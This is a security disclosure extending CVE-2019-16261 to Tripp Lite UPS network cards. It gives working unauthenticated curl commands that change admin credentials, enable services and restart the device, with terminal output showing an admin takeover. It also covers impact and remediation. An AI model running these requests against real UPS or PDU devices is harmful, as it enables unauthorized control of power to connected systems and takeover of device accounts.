Author: Lucas Lalumiere
Contact: lucas.lalum@gmail.com
Date: 2025-3-19
Vendor: Tripp Lite
Product: SU750XL UPS
Firmware: 12.04.0052
CVE Reference: CVE-2019-16261
- Tripp Lite PDU's (e.g., PDUMH15AT)
- Tripp Lite UPS's (e.g., SU750XL) NEW
CVE-2019-16261 describes a critical vulnerability in the Tripp Lite PDUMH15AT with firmware 12.04.0053, allowing unauthenticated users to send POST requests to the /Forms/ directory to:
- Change admin or manager passwords
- Shut off power to an outlet
- Disable/enable services
Through my own experimentation, I have discovered that this vulnerability is also effective on Tripp Lite UPS systems, including my Tripp Lite SU750XL, and applies to firmware 12.04.0052. This suggests the issue extends beyond just PDUs, as mentioned in the CVE, to the network cards equipped in Tripp Lite PDU's and UPS's (like my SNMPWEBCARD55) with vulnerable firmware versions 12.04.0053 and below.
These curl commands, similar to those provided originally by Jim Becher's blog, are among those I've tested on the SU750XL.
curl -X POST -d "netweb_access=00000001&nethttp_access=00000001&nethttp_port=80&nethttps_access=00000000&nethttps_port=443&savechanges=Save+Changes" http://[DEVICE_IP]/Forms/network_web_1
curl -X POST -d "startreset=Restart+PowerAlert" http://[DEVICE_IP]/Forms/requestreset_1Result (PowerAlert terminal):
System settings were changed.
Initiating system shutdown procedure ... complete.
The system is restarting now.
...
SERVICES:
HTTP is enabled on port 80
HTTPS is disabled on port 443
SSH is enabled on port 22
TELNET is enabled on port 23
FTP is enabled on port 21
SYSLOG is enabledcurl -X POST -d "securityadu=newadmin&securityad1=admin&securityad2=admin&savechanges=Save+Changes" http://[DEVICE_IP]/Forms/system_security_1
curl -X POST -d "startreset=Restart+PowerAlert" http://[DEVICE_IP]/Forms/requestreset_1Result (PowerAlert terminal):
System settings were changed.
Initiating system shutdown procedure ... complete.
The system is restarting now.
...
Login: newadmin
Password: *****
Logged in as user newadmin
$ _- High Availability Impact: Attackers can remotely control power functions, affecting critical systems connected to PDU/UPS'.
- High Confidentiality Impact: Attackers can obtain admin access to any of the device's information via changing credentials.
- High Integrity Impact: Attackers, if not through the POST requests, can modify any configuration by using modified admin credentials.
This vulnerability has already been patched in newer network card firmware versions and acknowledged by Eaton. It was previously reported in CVE-2019-16261 but was only attributed to Tripp Lite PDUMH15AT PDU's.
Upgrade webcard firmware to the newest version. You can find the download here:
- Original discovery: https://blog.korelogic.com/blog/2019/08/19/unpatched_fringe_infrastructure_bits
- CVE-2019-16261: https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-16261
- Jim Becher, 2019-08-19
This disclosure is being submitted to expand upon the original CVE report, adding additional affected products and detail. My find confirms that both Tripp Lite UPS and PDU devices equipped with optional network cards (e,g. SNMPWEBCARD55) with firmware 12.04.0053 and 12.04.0052 are vulnerable.